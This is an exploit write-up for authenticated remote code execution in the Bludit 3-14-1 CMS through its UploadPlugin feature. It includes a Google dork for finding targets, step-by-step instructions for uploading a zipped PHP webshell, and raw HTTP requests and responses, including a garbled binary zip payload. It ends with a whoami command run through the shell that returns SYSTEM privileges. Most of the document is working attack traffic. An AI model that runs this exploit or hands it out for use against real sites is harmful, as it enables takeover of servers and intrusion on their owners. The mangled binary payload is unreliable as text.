# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
# Step 1 : Archive as a zip your webshell (example: payload.zip)
# Step 2 : Login admin account and download 'UploadPlugin'
# Step 3 : Go to UploadPlugin section
# Step 4 : Upload your zip
# Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########
==============> START REQUEST <========================================
POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"
b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"
plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip
PK���� 聠e聢U � a/PK���� � 聰f聢U脝 陋)垄� 脛
a/a.php铆V脹聨脫0�}莽+L�a B脹矛V脺聳p��聛X庐脣J @V锚潞颅!碌聝铆脪r没wl7脡$mQy脿聭<$漏莽脤脤93茫赂脠]聝脣路茂聳贸脪=/�. p脻茫Z+M5/聲露B脦脠0>漏M聠[j脜聜脫B,聞玫�tO脤陇脪聹.
脳4�;�聮聠e)篓聝�录脠脳聰炉9[Z隆d冒脝 聞聦&脗d�<贸`梅+��聹N聴聮y录脕
RL脡E戮(铆7芒}芒酶聡_聡�楼忙3O潞脠�'x冒>A�炉�p聜p芒n脕茫陇毛脌脳e隆&聹眉�聬k聺拢聥录$脴j卤脴F媒芒聟谩@�\�@陋gxD垄脤'�聺谩么忙Q?陆v拢聼枚G7帽��霉Zg茅帽帽玫聯
�j卤u
\玫聞卤聠脿/茂戮脦脼聻��麓脳�T聶H脛Zu聶�j聹�聛�Hk陋聣脠拢没搂g�脩脜,C脝锚R�芒�V�j脜5y霉酶%}q�禄煤颅聞脛(聨QK*脣"脰茂隆拢;聴脪�虏路颅6z虏Z聼gX�脢貌垄冒铆脛'聧茅没霉+帽脤�%
碌j,脨盲脿N掳霉f,_脿8聴聯聥聲[鲁聵lO聙�ScsmI芦聡�卢芦H禄炉*Sc?i聰)i鹿麓&x@�.'聰�<聴陇脹莽]zs^�a庐路)聜�hBz0;f r矛聣镁脟赂0y脮U楼H"脮脮每I I脴\聯t�{c贸~聙J漏�拢陋盲虏脣 脰梅聬職;d脕鲁�芒脵lh聠禄s�%脟 脰8N潞+芦}+聨颅每a潞r聻聼聼聻脗脗j.
卯v�WS虏A驴O?nH聛O?聸j聻O 聬陇脙拢Q+矛炉忙铆^ 脧
e8漏么�*脭戮"媒隆@脫2+毛脗`聧梅
k��C57j漏�'脦�"m
茫庐ho�鹿 x聼么 脹;�聮聹�c莽z脵Q
脣路[k么驴脻炉聺-2矛~篓�聯忙v漏楼C聙�卯聭T镁#k2,U脴S�聨娄聙�颅聛O�脕S拢脴g聵聜煤K 聠聺Q聢脺 脴�I脧虏貌脰`脨:%F陆$��A"t;buOMr4�脻猫~�聳�e�茫脦�聶氓脴X铆脟m聵�脟(s 6A赂3,l>�潞聟<N庐娄q{s __~t脗聧6谩戮,聟脜猫莽O麓脟脝脳脦�拢v虏卤茫每�b脙聭脷聮聭Ug[;�p�q�聸e脫脺脜脴�每茅J
脣}聺锚v聜3冒8麓# 聤O碌s脠O芦媒�b聝�h卤茂掳聼d聴脣聟鹿每聢>y镁冒Mr枚芒脕Sz枚忙玫脙没脧脺没)}贸脿e�潞qQRrf}锚锚_��D 脴0矛u聮玫v'搂枚酶?@聡 �锚没O忙h'聵O聹8f�聴聛D录5[脿虏=b�~�PK��?��� 聠e聢U � $ �聙铆A a/
� � 镁職庐,
脵� 镁職庐,
脵�聙酶篓j.
脵�PK��?��� � 聰f聢U脝 陋)垄� 脛
$ 聙陇聛 a/a.php
� � 陇e脻-
脵� 梅聺C-
脵� b�j.
脵�PK�� � � 颅 莽�
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"
Upload
-----------------------------308003478615795926433430552264--
==============> END REQUEST <========================================
## WEB SHELL UPLOADED!
==============> START RESPONSE <========================================
HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.
==============> END RESPONSE <========================================
# REQUEST THE WEB SHELL
==============> START REQUEST <========================================
GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
==============> END REQUEST <========================================
==============> START RESPONSE <========================================
HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32
<pre>nt authority\system
</pre>
==============> END RESPONSE <========================================